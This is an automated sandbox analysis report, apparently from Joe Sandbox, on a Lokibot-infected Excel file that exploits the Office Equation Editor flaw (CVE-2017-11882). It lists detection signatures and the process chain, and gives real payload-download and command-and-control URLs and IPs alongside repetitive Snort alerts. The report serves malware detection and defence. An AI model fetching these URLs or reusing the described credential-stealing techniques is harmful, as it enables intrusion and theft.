Play interactive tour

Edit tour

Analysis Report MV NAGOYA TRADER.xlsx

Overview

General Information

Sample Name:	MV NAGOYA TRADER.xlsx
Analysis ID:	332678
MD5:	dd41f88e3d53755f0aa1318bf473d08b
SHA1:	54ccf49aaf860ab2531b37dd38adc0273b6f2551
SHA256:	6f68432c8c109e52980cef46236114266c97a5791808053b07a943d7686f8f55
Tags:	LokiVelvetSweatshopxlsx
Most interesting Screenshot:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM_3

Yara detected Lokibot

Binary contains a suspicious time stamp

Drops PE files to the user root directory

Found C&C like URL pattern

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches the installation path of Mozilla Firefox

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2520 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2952 cmdline: 'C:\Users\Public\vbc.exe' MD5: 3EE960D7D595C82B47CE28164AFED056)

vbc.exe (PID: 3040 cmdline: {path} MD5: 3EE960D7D595C82B47CE28164AFED056)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x47697:$des3: 68 03 66 00 00 0x4ba94:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x4bb60:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.2195981464.0000000002377000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x162fdf:$des3: 68 03 66 00 00 0x1673d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x16749c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: vbc.exe PID: 3040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 3040	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vbc.exe PID: 3040	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: vbc.exe PID: 2952	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2952	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vbc.exe PID: 2952	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.vbc.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.vbc.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.2.vbc.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2320, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2952

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.141.138.119, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: begadi.ga	Virustotal: Detection: 12%	Perma Link
Source: http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe	Virustotal: Detection: 6%	Perma Link
Source: http://begadi.ga/chud/gate.php	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	ReversingLabs: Detection: 32%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Show sources

Source: MV NAGOYA TRADER.xlsx	Virustotal: Detection: 31%			Perma Link
Source: MV NAGOYA TRADER.xlsx	ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: excel.exe

Memory has grown: Private usage: 4MB later: 35MB

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 006E612Dh		4_2_006E60A9
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 006E612Dh		4_2_006E60B8

Source: global traffic

DNS query: name: chnesstdyqudusisabadassniggainthestfmv.ydns.eu

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.141.138.119:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.141.138.119:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.141.138.119:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49168 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49169 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49170 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49170
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49173 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49174 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49175 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49176 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49177 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49178 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49179 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49180 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49180
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49181 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49182 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49182
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49183 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49184 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49184
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49185 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49186 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49186
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49187 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 185.193.143.118:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49188 -> 185.193.143.118:80
